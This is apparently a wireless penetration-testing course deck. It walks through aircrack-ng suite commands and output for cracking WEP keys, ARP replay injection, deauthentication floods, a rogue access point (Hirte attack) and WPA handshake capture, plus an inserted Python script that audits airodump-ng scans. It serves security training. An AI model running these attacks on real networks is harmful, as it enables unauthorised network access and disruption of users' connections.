
Penetration Testing of Wireless Networks

Nelson Murilo
Clavis Segurança da Informação
$ whoami

Infosec consultant
2 published books
Pentester
Forensic investigator
Incident handler
Instructor and speaker
Contacts

nmurilo@gmail.com

nelson.murilo

@nelsonmurilo
Course Model

Live (online) classes

Recorded classes for review
Test environments
Supplementary material
Assessment
Agenda

Introduction
Wi-Fi network concepts
Main vulnerabilities
Current tools
Probing and mapping
Environment identification
Attacks
Wrap-up
Introduction

Concepts

Characteristics
Wireless networks

Wi-Fi
Bluetooth
Infrared
WiMax
RFID
Cellular (GSM/TDMA/CDMA, etc.)
ZigBee (802.15.4)
UWB (802.15.3)
IEEE 802.11
Current standards:
802.11b: 11 Mb/s, 2.4 GHz
802.11a: 54 Mb/s, 5.1 GHz
802.11g: 54 Mb/s, 2.4 GHz
802.11i: security mechanisms
802.1x: authentication mechanisms, used on wired and wireless networks
802.11n: higher speed, 108 Mb/s nominal
# dmesg | grep phy
[ 0.000000] BIOS-provided physical RAM map:
[ 84.913442] ieee80211 phy0: Selected rate control algorithm 'minstrel_ht'
[ 84.913969] Registered led device: rt2800usb-phy0::radio
[ 84.913999] Registered led device: rt2800usb-phy0::assoc
[ 84.914026] Registered led device: rt2800usb-phy0::quality
# iwconfig
lo no wireless extensions.

wlan4 IEEE 802.11bgn ESSID:off/any


Mode:Managed Access Point: Not-Associated Tx-Power=0 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:on

eth4 no wireless extensions.



Channels

$ iwlist wlan0 freq
wlan0     24 channels in total; available frequencies :
          Channel 01 : 2.412 GHz
          Channel 02 : 2.417 GHz
          Channel 03 : 2.422 GHz
          Channel 04 : 2.427 GHz
          Channel 05 : 2.432 GHz
          Channel 06 : 2.437 GHz
          Channel 07 : 2.442 GHz
          Channel 08 : 2.447 GHz
          Channel 09 : 2.452 GHz
          Channel 10 : 2.457 GHz
          Channel 11 : 2.462 GHz
          Channel 36 : 5.18 GHz
          Channel 40 : 5.2 GHz
          Channel 44 : 5.22 GHz
          Channel 48 : 5.24 GHz
          Channel 52 : 5.26 GHz
          Channel 56 : 5.28 GHz
          Channel 60 : 5.3 GHz
          Channel 64 : 5.32 GHz
          Channel 149 : 5.745 GHz
          Channel 153 : 5.765 GHz
          Channel 157 : 5.785 GHz
          Channel 161 : 5.805 GHz
          Channel 165 : 5.825 GHz


Ad-Hoc
Infrastructure

((( Network name )))

Network name disclosure

# iwlist wlan0 scan | egrep "Address|ESSID"


[...]
Cell 05 - Address: 7C:4F:B5:E4:CC:80
ESSID:"GVT-CC81"
Cell 06 - Address: 00:07:40:4D:1A:5C
ESSID:"\x00\x00\x00\x00\x00\x00\x00\x00"
Cell 07 - Address: 6C:2E:85:F3:0C:8B
ESSID:"GVT-0C87"

Network name disclosure


23:05:16.386193 Beacon () [1.0 2.0 5.5 11.0 6.0 12.0 24.0 36.0 Mbit] ESS CH: 11
23:05:16.488612 Beacon () [1.0 2.0 5.5 11.0 6.0 12.0 24.0 36.0 Mbit] ESS CH: 11
23:05:17.321039 Beacon (Homenet54) [1.0 2.0 5.5 11.0 Mbit] ESS CH: 3
23:05:17.629271 Beacon (Homenet54) [1.0 2.0 5.5 11.0 Mbit] ESS CH: 3
Network name disclosure

00:07:40:4D:1A:5C
09:15:42.216583 218us BSSID:00:07:40:4d:1a:5c (oui Unknown) DA:00:07:40:4d:1a:5c (oui Unknown) SA:00:21:29:65:b8:45 (oui Unknown) Probe Request (LABVIRUS) [1.0 2.0 5.5 11.0 6.0 9.0 12.0 18.0 Mbit][|802.11]

09:15:42.217642 Retry 218us BSSID:00:07:40:4d:1a:5c (oui Unknown) DA:00:07:40:4d:1a:5c (oui Unknown) SA:00:21:29:65:b8:45 (oui Unknown) Probe Request (LABVIRUS) [1.0 2.0 5.5 11.0 6.0 9.0 12.0 18.0 Mbit][|802.11]

09:15:42.218638 314us BSSID:00:07:40:4d:1a:5c (oui Unknown) DA:00:21:29:65:b8:45 (oui Unknown) SA:00:07:40:4d:1a:5c (oui Unknown) Probe Response (LABVIRUS) [1.0* 2.0* 5.5* 11.0* Mbit] CH: 11[|802.11]
WEP
WPA
WPA-PSK (Pre-shared Key)
WPA-Enterprise (RADIUS)

WPA-Enterprise: the RADIUS server can authenticate against
/etc/password
/etc/raddb/users
Oracle/MySQL/etc.
Digital certificate
Biometrics
Initial concepts

$ /sbin/ifconfig wlan0
wlan0 Link encap:Ethernet HWaddr 00:21:29:65:b8:45
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
Promiscuous mode

# tcpdump -vv -c 3 -i wlan0
tcpdump: listening on wlan0, link-type EN10MB (Ethernet), capture size 65535 bytes
14:00:37.291962 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto ICMP (1), length 84)
    192.168.11.2 > air: ICMP echo request, id 30507, seq 9, length 64

14:00:37.292417 IP (tos 0x0, ttl 64, id 8024, offset 0, flags [DF], proto UDP (17), length 71)
    192.168.11.2.49351 > air: [udp sum ok] 2302+ PTR? 1.11.168.192.in-addr.arpa. (43)

14:00:37.294831 IP (tos 0x0, ttl 255, id 49706, offset 0, flags [none], proto ICMP (1), length 84)
    air > 192.168.11.2: ICMP echo reply, id 30507, seq 9, length 64
3 packets captured
Promiscuous mode

# iwconfig wlan0
wlan0 IEEE 802.11bg ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:on

# iw wlan0 info
Interface wlan0
index 32
type managed
Monitor mode

# iwconfig wlan0 mode monitor


# iw dev wlan0 interface add mon0 type monitor

Monitor mode

# iwconfig mon0
mon0 IEEE 802.11bg Mode:Monitor Tx-Power=20 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Power Management:on

# iw mon0 info
Interface mon0
index 35
type monitor

Monitor mode

# tcpdump -c 3 -i mon0 -vv
tcpdump: WARNING: mon0: no IPv4 address assigned
tcpdump: listening on mon0, link-type IEEE802_11_RADIO (802.11 plus radiotap header), capture size 65535 bytes

14:22:52.234724 1.0 Mb/s 2412 MHz 11b -74dB signal antenna 1 [bit 14] 0us Beacon (LABVIRUS) [1.0* 2.0* 5.5* 11.0* 18.0 24.0 36.0 54.0 Mbit] ESS CH: 1, PRIVACY[|802.11]

14:22:52.260469 1.0 Mb/s 2412 MHz 11b -48dB signal antenna 1 [bit 14] WEP Encrypted 0us Data IV:5b5 Pad 20 KeyID 2

14:22:52.261938 54.0 Mb/s 2412 MHz 11g -18dB signal antenna 1 [bit 14] WEP Encrypted 44us Data IV:4104 Pad 20 KeyID 0
3 packets captured
Channel selection

# iwconfig mon0 channel 11

# iwconfig mon0
mon0 IEEE 802.11bg Mode:Monitor Frequency:2.462 GHz Tx-Power=20 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Power Management:on
Channel selection

# tcpdump -c 3 -i mon0 -vv
tcpdump: WARNING: mon0: no IPv4 address assigned
tcpdump: listening on mon0, link-type IEEE802_11_RADIO (802.11 plus radiotap header), capture size 65535 bytes

14:49:58.832316 1.0 Mb/s 2462 MHz 11b -62dB signal antenna 1 [bit 14] 0us Beacon () [1.0* 2.0* 5.5* 11.0* Mbit] ESS CH: 11[|802.11]

14:49:58.847041 1.0 Mb/s 2462 MHz 11b -78dB signal antenna 1 [bit 14] 0us Beacon (GVT-CC81) [1.0* 2.0* 5.5* 11.0* 6.0 9.0 12.0 18.0 Mbit] ESS CH: 11, PRIVACY[|802.11]

14:49:58.866671 1.0 Mb/s 2462 MHz 11b -80dB signal antenna 1 [bit 14] 0us Beacon (GVT-0C87) [1.0* 2.0* 5.5* 11.0* 6.0 9.0 12.0 18.0 Mbit] ESS CH: 11, PRIVACY[|802.11]
3 packets captured
AP identification

CH 5 ][ Elapsed: 0 s ][ 2012-03-07 14:39

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:25:9C:36:A0:9F -88 15 18 108 47 5 11e. OPN bsbca

BSSID STATION PWR Rate Lost Frames Probe

00:25:9C:36:A0:9F 00:0E:2E:EC:6B:05 -1 11 - 0 0 1
00:25:9C:36:A0:9F 00:0E:2E:45:F5:B3 -1 11 - 0 0 1
AP identification

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:25:9C:36:A0:9F -88 15 18 108 47 5 11e. OPN bsbca

grep 00-25-9C /usr/local/etc/aircrack-ng/airodump-ng-oui.txt


00-25-9C (hex) Cisco-Linksys, LLC
AP identification

Traffic analysis
tshark -r Kismet-20120309-04-23-25-1.pcapdump

6007 334.636502 Apple_67:a1:ef -> Broadcast ARP 114 Gratuitous ARP for 192.168.1.104 (Request)
6448 358.804988 192.168.1.191 -> 239.255.255.250 SSDP 487 NOTIFY * HTTP/1.1
9739 547.951220 Fortinet_ca:d3:11 -> Motorola_21:29:6a ARP 116 Who has 192.168.1.18? Tell 192.168.1.1
9740 547.953352 Fortinet_ca:d3:11 -> Motorola_21:29:6a ARP 116 Who has 192.168.1.18? Tell 192.168.1.1
10144 572.216034 192.168.1.103 -> 224.0.0.251 MDNS 645 Standard query response TXT, cache flush PTR
AP identification

Traffic analysis
iwconfig wlan5 essid bsbca

iwconfig wlan5
wlan5 IEEE 802.11abgn ESSID:"bsbca"
Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:on
MAC filtering

Linux
# ifconfig ath0 hw ether 00:00:00:00:00:01

Mac OSX
# ifconfig en0 ether 00:00:00:00:00:01

FreeBSD
# ifconfig xl3 ether 00:00:00:00:00:01

OpenBSD/NetBSD
# wiconfig wi0 -m 00:00:00:00:00:01
Wired Equivalent Privacy

Fragile protocol

Cracking requires capturing a large number of packets (5k+)

Or a dictionary attack

Several tools available


Wired Equivalent Privacy

CH 11 ][ Elapsed: 0 s ][ 2012-02-20 11:06

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:07:40:4D:1A:5C -39 0 3 17 8 11 54 WEP WEP LABVIRUS

BSSID STATION PWR Rate Lost Frames Probe

00:07:40:4D:1A:5C 00:21:29:65:B8:45 0 54 -36 0 20 LABVIRUS


Wired Equivalent Privacy
/usr/local/etc/kismet.conf

logtypes=pcapdump,gpsxml,netxml,nettxt,alert

gps=true
preferredchannels=1,6,11

allowplugins=true
$ ls -lh Kismet*
-rw-r--r-- 1 root root 8.0M 2012-02-20 14:04 Kismet-20120220-13-47-37-1.pcapdump
http://blog.kismetwireless.net/
Suite made up of several programs

Traffic analysis

WEP key cracking (several types of attacks)

Packet injection

WPA(2)-PSK key cracking using a dictionary

Creation of a fake access point



Common sequence

Airmon-ng: puts the interface in monitor mode

Airodump-ng: viewing and capturing packets

Aircrack-ng: cracking the WEP key



# airmon-ng

Interface Chipset Driver

wlan5 Ralink RT2870/3070 rt2800usb - [phy48]


# airmon-ng start wlan5
Interface Chipset Driver

wlan2 Realtek RTL8187L rtl8187 - [phy51]


(monitor mode enabled on mon0)
# airmon-ng start wlan5 11
Interface Chipset Driver

wlan2 Realtek RTL8187L rtl8187 - [phy51]


(monitor mode enabled on mon0)
Airodump-ng

# airodump-ng wlan0
ioctl(SIOCSIWMODE) failed: Device or resource busy

ARP linktype is set to 1 (Ethernet) - expected ARPHRD_IEEE80211,
ARPHRD_IEEE80211_FULL or ARPHRD_IEEE80211_PRISM instead.  Make
sure RFMON is enabled: run 'airmon-ng start wlan0 <#>'
Sysfs injection support was not found either.
Airodump-ng

# airodump-ng mon0

CH 11 ][ Elapsed: 4 s ][ 2012-02-21 17:01

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:07:40:4D:1A:5C -41 1091 55109 0 0 11 54 WEP WEP LABVIRUS

BSSID STATION PWR Rate Lost Frames Probe

00:07:40:4D:1A:5C 00:21:29:65:B8:45 -127 0 -1 3 9 LABVIRUS


Aircrack-ng

$ aircrack-ng labvirus-01.pcap


[00:00:05] Tested 633 keys (got 46103 IVs)

KB depth byte(vote)
0 2/ 4 14(55552) 13(54528) 3C(53504) 98(53504) 24(53248)
1 2/ 1 DE(54784) 92(54528) 06(52992) 7D(52736) 02(52480)
2 1/ 3 82(56576) 18(54272) 45(53760) CD(53504) FC(53248)
3 1/ 3 09(57600) 08(55808) 41(55040) C9(54016) 8E(52992)
4 51/ 4 A1(48640) 83(48384) 86(48384) 99(48384) B2(48384)

KEY FOUND! [ 6E:61:6F:XX:XX:XX:XX:XX:XX:XX:XX ] (ASCII: naoxxxxxxxx )
Decrypted correctly: 100%
Wired Equivalent Privacy
Aireplay-ng

# aireplay-ng --test mon0


17:33:50 Trying broadcast probe requests...
17:33:50 Injection is working!
17:33:52 Found 1 AP

17:33:52 Trying directed probe requests...


17:33:52 00:25:9C:36:0A:EF - channel: 11 - 'LABVIRUS'
17:33:52 Ping (min/avg/max): 1.671ms/6.230ms/11.234ms Power: -28.73
17:33:52 30/30: 100%
Aireplay-ng

# aireplay-ng --arpreplay -h client_mac -e ESSID interface

# ping -c 1 192.168.11.1
PING 192.168.11.1 (192.168.11.1) 56(84) bytes of data.
64 bytes from 192.168.11.1: icmp_seq=1 ttl=255 time=54.9 ms

--- 192.168.11.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 54.973/54.973/54.973/0.000 ms

# arp -an
? (192.168.11.1) at 00:07:40:35:a1:18 [ether] on wlan0
Aireplay-ng

CH 11 ][ Elapsed: 24 s ][ 2012-02-21 17:40

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:07:40:4D:1A:5C -38 100 239 58 1 11 54 WEP WEP LABVIRUS

BSSID STATION PWR Rate Lost Frames Probe

00:07:40:4D:1A:5C 00:21:29:65:B8:45 -14 36 -54 1 128 LABVIRUS


Aireplay-ng

# aireplay-ng --arpreplay -h 00:21:29:65:B8:45 -e LABVIRUS mon0
The interface MAC (00:26:5A:74:15:28) doesn't match the specified MAC (-h).
        ifconfig mon0 hw ether 00:21:29:65:B8:45
17:44:10  Waiting for beacon frame (ESSID: LABVIRUS) on channel 11
Found BSSID "00:07:40:4D:1A:5C" to given ESSID "LABVIRUS".
Saving ARP requests in replay_arp-0221-174410.cap
You should also start airodump-ng to capture replies.
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Read 67093 packets (got 9624 ARP requests and 14601 ACKs), sent 15934 packets...(500 pps)
Aireplay-ng

CH 11 ][ Elapsed: 48 s ][ 2012-02-21 17:44 ][ Decloak: 00:07:40:4D:1A:5C

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:07:40:4D:1A:5C -38 100 353 14438 652 11 54 WEP WEP LABVIRUS

BSSID STATION PWR Rate Lost Frames Probe

00:07:40:4D:1A:5C 00:21:29:65:B8:45 0 54 - 1 4042 28810 LABVIRUS


Aireplay-ng

# airmon-ng start wlan5 11


Interface Chipset Driver

wlan2 Realtek RTL8187L rtl8187 - [phy51]


(monitor mode enabled on mon0)

# airodump-ng -c 11 mon0
Aireplay-ng

Wait for a new connection

Or force a disconnection

aireplay-ng --deauth 100 -h CLIENT_MAC -e ESSID mon0
ivstools-ng

Aircrack-ng 1.1 r2076


[00:00:02] Tested 132441 keys (got 2448 IVs)
KB depth byte(vote)
0 19/ 34 F7(3840) 05(3584) 1A(3584) 2B(3584) 32(3584)
1 43/ 1 E7(3328) 01(3072) 02(3072) 04(3072) 0B(3072)
2 42/ 2 BB(3328) 15(3072) 21(3072) 28(3072) 34(3072)
3 0/ 7 CB(5888) A7(4352) 0B(4096) 5E(4096) 93(4096)
4 8/ 47 FF(4096) 1B(3840) 2E(3840) 44(3840) 83(3840)

Failed. Next try with 5000 IVs.


ivstools-ng

Aircrack-ng 1.1 r2076


[00:00:03] Tested 163521 keys (got 7120 IVs)
KB depth byte(vote)
0 4/ 7 FE(9984) 18(9728) 29(9728) 7F(9728) B4(9728) F6(9728)
1 23/ 24 B5(8960) 27(8704) 37(8704) 4A(8704) 51(8704) 53(8704)
2 44/ 2 FA(8448) 00(8192) 26(8192) 2B(8192) 3D(8192) 4C(8192)
3 19/ 3 93(9216) 0B(8960) 11(8960) 12(8960) 1D(8960) 3F(8960)
4 19/ 20 BE(8960) 0A(8704) 11(8704) 12(8704) 3E(8704) 52(8704)

Failed. Next try with 10000 IVs.


ivstools-ng

for i in poucosivs-0*; do ivstools --convert $i $i.ivs ; done


Opening poucosivs-01.cap
Creating poucosivs-01.cap.ivs
Read 18995 packets.
Written 2448 IVs.
Opening poucosivs-03.cap
Creating poucosivs-03.cap.ivs
Read 551433 packets.
Written 30547 IVs.
Opening poucosivs-04.cap
Creating poucosivs-04.cap.ivs
Read 129917 packets.
Written 13092 IVs.
ivstools-ng

ivstools --merge *.ivs poucostotal.ivs


Creating poucostotal.ivs
Opening poucosivs-01.cap.ivs
334818 bytes written
Opening poucosivs-03.cap.ivs
4524402 bytes written
Opening poucosivs-04.cap.ivs
6319236 bytes written
ivstools-ng

# aircrack-ng poucosivs-01.cap poucosivs-02.cap poucosivs-03.cap poucosivs-04.cap


Opening poucosivs-01.cap
Opening poucosivs-02.cap
Opening poucosivs-03.cap
Opening poucosivs-04.cap
Read 689344 packets.

# BSSID ESSID Encryption

1 00:07:40:4D:1A:5C LABVIRUS WEP (40296 IVs)


# tcpdump -vvv -n -r labvirus-01.cap
16:24:28.546838 0us Beacon (LABVIRUS) [1.0* 2.0* 5.5* 11.0* Mbit] ESS CH: 11, PRIVACY[|802.11]
16:24:29.251394 104us Clear-To-Send RA:c8:bc:c8:20:38:5c
16:24:29.251398 0us Acknowledgment RA:c8:bc:c8:20:38:5c
16:24:29.251910 0us Acknowledgment RA:00:1c:b3:af:ae:1e
16:24:29.259072 90us Request-To-Send TA:c8:bc:c8:20:38:5c
16:24:29.259080 46us Clear-To-Send RA:c8:bc:c8:20:38:5c
16:24:29.259586 90us Request-To-Send TA:c8:bc:c8:20:38:5c
16:24:29.259594 46us Clear-To-Send RA:c8:bc:c8:20:38:5c
16:24:29.396292 90us Request-To-Send TA:c8:bc:c8:20:38:5c
# airdecap-ng -w 6E616FXXXXXXXXXX -e LABVIRUS labvirus-01.cap
Total number of packets read           298278
Total number of WEP data packets       162412
Total number of WPA data packets            0
Number of plaintext data packets            0
Number of decrypted WEP packets        108781
Number of corrupted WEP packets             0
Number of decrypted WPA packets             0

Decrypted capture, read with tcpdump:
16:24:43.166932 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 272
16:24:43.170518 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 335
16:24:43.173590 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 327
16:24:43.176662 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 272
16:24:43.181784 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 311
16:24:43.187416 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 343
16:24:43.190486 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 272
16:24:43.193558 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 331
16:24:43.197654 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 337
16:24:43.201748 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 325
16:24:43.204822 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 331
16:25:05.057281 IP 0.0.0.0.bootpc > 255.255.255.255.bootps: BOOTP/DHCP, Request from 00:21:29:65:b8:45 (oui Unknown), length 300
16:25:05.060444 IP 192.168.11.1.bootps > 192.168.11.2.bootpc: BOOTP/DHCP, Reply, length 300
16:25:05.075290 IP 0.0.0.0.bootpc > 255.255.255.255.bootps: BOOTP/DHCP, Request from 00:21:29:65:b8:45 (oui Unknown), length 300
CH 11 ][ Elapsed: 4 s ][ 2012-02-27 21:14

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

2E:74:C2:BA:A5:8A -87 2 0 0 3 54e WPA2 CCMP PSK iPhone de Marcelo
00:25:9C:36:0A:EF -45 3 0 0 1 54 WPA2 CCMP PSK Homenet54

BSSID STATION PWR Rate Lost Frames Probe

(not associated) 00:1B:77:7C:2C:A7 -86 0 - 1 68 8 Notebook
(not associated) 00:21:29:65:B8:45 -47 0 - 1 7 2 LABVIRUS
Wired Equivalent Privacy

CH 4 ][ Elapsed: 28 s ][ 2012-02-28 07:59

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:26:CB:11:5F:30 -64 16 0 0 11 54e. WPA2 CCMP MGT 88200W


00:1C:10:AE:B6:8F -68 20 0 0 6 54 OPN linksys
74:EA:3A:CF:13:7C -70 15 2 0 11 54 . WPA2 CCMP PSK LABVIRUS
00:E0:FC:4D:27:49 -79 0 0 0 11 54 WPA2 TKIP PSK Pessoal

BSSID STATION PWR Rate Lost Frames Probe

(not associated) DC:2B:61:33:2B:6C -53 0 - 1 0 12 Boingo Hotspot,EuroYouthHotel,hostalparis3,RYANS-PARADIS-W
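As an added defender-side example, not part of the course material: a Python audit script that parses an airodump-ng snapshot like the ones above and reports what a wireless assessment should flag (open networks, WEP, TKIP, hidden SSIDs, and clients that broadcast their saved network names in probe requests). The snapshot is constructed from rows on these slides plus one hypothetical hidden-SSID row (BSSID 02:00:00:00:00:01).

```python
import re
from dataclasses import dataclass

# Constructed airodump-ng snapshot: rows taken from the slides above, plus one
# hypothetical hidden-SSID row (BSSID 02:00:00:00:00:01) in airodump's "<length:  0>" form.
AIRODUMP_SNAPSHOT = """\
CH  4 ][ Elapsed: 28 s ][ 2012-02-28 07:59

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:26:CB:11:5F:30  -64       16        0    0  11  54e. WPA2 CCMP   MGT  88200W
 00:1C:10:AE:B6:8F  -68       20        0    0   6  54   OPN              linksys
 74:EA:3A:CF:13:7C  -70       15        2    0  11  54 . WPA2 CCMP   PSK  LABVIRUS
 00:E0:FC:4D:27:49  -79        0        0    0  11  54   WPA2 TKIP   PSK  Pessoal
 00:07:40:4D:1A:5C  -39        3       17    8  11  54   WEP  WEP         LABVIRUS
 02:00:00:00:00:01  -41        3        0    0  11  54   WPA2 CCMP   PSK  <length:  0>

 BSSID              STATION            PWR   Rate    Lost  Frames  Probe

 (not associated)   DC:2B:61:33:2B:6C  -53    0 - 1      0      12  Boingo Hotspot,EuroYouthHotel,hostalparis3
 (not associated)   00:21:29:65:B8:45  -47    0 - 1      7       2  LABVIRUS
 00:07:40:4D:1A:5C  00:21:29:65:B8:45  -14   36 -54      1     128  LABVIRUS
"""

MAC_RE = re.compile(r"[0-9A-Fa-f]{2}(?::[0-9A-Fa-f]{2}){5}")
ENC_TOKENS = {"OPN", "WEP", "WPA", "WPA2", "WPA2WPA"}


@dataclass
class AccessPoint:
    bssid: str
    enc: str
    cipher: str
    auth: str
    essid: str


@dataclass
class ProbingStation:
    mac: str
    probes: list


def parse_snapshot(text):
    """Split an airodump-ng text snapshot into AP rows and unassociated-client rows."""
    aps, stations = [], []
    for line in text.splitlines():
        toks = line.split()
        if len(toks) < 2:
            continue
        if toks[:2] == ["(not", "associated)"]:
            # columns: (not associated) STATION PWR rx - tx Lost Frames Probe...
            probes = " ".join(toks[9:])
            stations.append(ProbingStation(toks[2], [p for p in probes.split(",") if p]))
        elif MAC_RE.fullmatch(toks[0]) and not MAC_RE.fullmatch(toks[1]):
            # AP row: anchor on the ENC column; airodump prints no CIPHER/AUTH for OPN
            # and no AUTH for plain WEP, and the ESSID may contain spaces.
            idx = next((i for i, t in enumerate(toks) if t in ENC_TOKENS), None)
            if idx is None:
                continue
            enc = toks[idx]
            if enc == "OPN":
                cipher, auth, rest = "", "", toks[idx + 1:]
            elif enc == "WEP":
                cipher, auth, rest = toks[idx + 1], "", toks[idx + 2:]
            else:
                cipher, auth, rest = toks[idx + 1], toks[idx + 2], toks[idx + 3:]
            aps.append(AccessPoint(toks[0], enc, cipher, auth, " ".join(rest)))
    return aps, stations


def audit(text):
    """Return (subject, severity, message) findings a wireless assessment should report."""
    aps, stations = parse_snapshot(text)
    findings = []
    for ap in aps:
        if ap.enc == "OPN":
            findings.append((ap.bssid, "HIGH", f"open network '{ap.essid}': all traffic readable over the air"))
        elif ap.enc == "WEP":
            findings.append((ap.bssid, "HIGH", f"WEP on '{ap.essid}': key recoverable from captured IVs; migrate to WPA2-CCMP"))
        elif ap.cipher == "TKIP":
            findings.append((ap.bssid, "MEDIUM", f"TKIP on '{ap.essid}': deprecated cipher, move to CCMP"))
        if ap.essid.startswith("<length:"):
            findings.append((ap.bssid, "INFO", "hidden SSID: the name still appears in probe requests/responses, so this is not a control"))
    for st in stations:
        if st.probes:
            names = ", ".join(st.probes)
            findings.append((st.mac, "MEDIUM", f"client broadcasts {len(st.probes)} saved network name(s) ({names}); it will join a rogue AP using one of them"))
    return findings


def count_by_severity(findings):
    counts = {}
    for _, sev, _ in findings:
        counts[sev] = counts.get(sev, 0) + 1
    return counts


if __name__ == "__main__":
    for subject, sev, msg in audit(AIRODUMP_SNAPSHOT):
        print(f"[{sev:6}] {subject}  {msg}")
```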


Wired Equivalent Privacy

# airbase-ng -N --essid LABVIRUS -c 1 -v -W 1 mon0


09:57:07 Created tap interface at0
09:57:07 Trying to set MTU on at0 to 1500
09:57:07 Access Point with BSSID 00:21:29:65:B8:45 started.
09:57:09 Got broadcast probe request from 34:15:9E:E3:97:A7
09:57:09 Got broadcast probe request from 34:15:9E:E3:97:A7
09:57:09 Got directed probe request from E0:F8:47:C3:30:14 - "LABVIRUS"
09:57:09 Got directed probe request from E0:F8:47:C3:30:14 - "LABVIRUS"
09:57:10 Got an auth request from E0:F8:47:C3:30:14 (shared key)
09:57:10 Broken SKA: E0:F8:47:C3:30:14 (expected: 151, got 32 bytes)
09:57:10 SKA from E0:F8:47:C3:30:14
09:57:10 Client E0:F8:47:C3:30:14 associated (WEP) to ESSID: "LABVIRUS"
09:57:10 Ignored IPv6 packet.
09:57:10 Starting Hirte attack against E0:F8:47:C3:30:14 at 100 pps.
09:57:10 Added ARP packet to cfrag buffer.
Wired Equivalent Privacy


# airodump-ng --bssid 00:21:29:65:B8:45 -w cafe-latte -c 1 mon0
# aircrack-ng cafe-latte-01.cap

Aircrack-ng 1.1 r2076


[00:00:00] Tested 798 keys (got 38085 IVs)

KB depth byte(vote)
0 0/ 1 6E(56064) 15(45824) 3D(45312) AA(44800) 4A(44288)
1 0/ 9 61(53760) 44(46336) 98(45568) 0E(44800) C4(44800)
2 33/ 2 AE(41728) 18(41472) 6C(41472) 6F(41472) A1(41472)
3 7/ 3 F0(43776) 70(43264) B4(43264) 62(43008) 50(42752)
4 0/ 2 B8(56576) CD(46848) 94(46080) C9(45056) 3F(44800)

KEY FOUND! [ 6E:61:6F:XX:XX:XX:XX:XX:XX:XX:XX:XX] (ASCII: naoxxxxxxxxxxx )


Decrypted correctly: 100%


AP with no clients

WPA-WEP migration

WPA

CH 5 ][ Elapsed: 3 mins ][ 2012-02-22 05:45

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:26:CB:11:5F:30 -64 66 1 0 11 54e. WPA2 CCMP MGT 88200Wireless-d


00:26:CB:B9:23:40 -77 68 0 0 6 54e. WPA2 CCMP MGT 88200Wireless-d
00:26:CB:C4:BD:90 -81 66 0 0 6 54e. WPA2 CCMP MGT 88200Wireless-d
94:0C:6D:BB:2C:94 -89 23 0 0 6 11 . WPA2 CCMP PSK Testeee
00:14:D1:C7:BD:00 -90 51 7 0 11 54e OPN AER 5 andar
00:26:CB:B9:24:C0 -82 17 0 0 1 54e. WPA2 CCMP MGT 88200Wireless-d
00:26:CB:C4:BA:00 -90 9 0 0 11 54e. WPA2 CCMP MGT 88200Wireless-d
airodump-ng -w labvirus_wpa -c 11 --bssid 00:07:40:4D:1a:5c mon0
CH 11 ][ Elapsed: 12 s ][ 2012-03-01 14:06

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:07:40:4D:1A:5C -45 61 76 25 1 11 54 WPA CCMP PSK LABVIRUS

BSSID STATION PWR Rate Lost Frames Probe

00:07:40:4D:1A:5C 00:26:5A:74:15:28 -25 54 - 5 8 26


aircrack-ng labvirus_wpa-01.cap
Opening labvirus_wpa-01.cap
Read 254839 packets.

# BSSID ESSID Encryption

1 00:07:40:4D:1A:5C LABVIRUS WPA (0 handshake)


aircrack-ng labvirus_wpa-01.cap
Opening labvirus_wpa-01.cap
Read 698 packets.

# BSSID ESSID Encryption

1 00:07:40:4D:1A:5C LABVIRUS WPA (1 handshake)

Choosing first network as target.

Opening labvirus_wpa-01.cap
Please specify a dictionary (option -w).
tshark -r dlink-01.cap -R eapol
39965 377.079356 D-Link_50:2f:2e -> D-Link_74:15:28 EAPOL 131 Key (msg 1/4)
39968 377.086048 D-Link_74:15:28 -> D-Link_50:2f:2e EAPOL 160 Key (msg 2/4)
39969 377.089080 D-Link_50:2f:2e -> D-Link_74:15:28 EAPOL 187 Key (msg 3/4)
39971 377.104480 D-Link_74:15:28 -> D-Link_50:2f:2e EAPOL 136 Key (msg 4/4)
aireplay-ng --deauth 100 -c 00:26:5A:74:15:28 -e dlink mon0
08:49:22 Waiting for beacon frame (ESSID: dlink) on channel 6
Found BSSID "00:1B:11:50:2F:2E" to given ESSID "dlink".
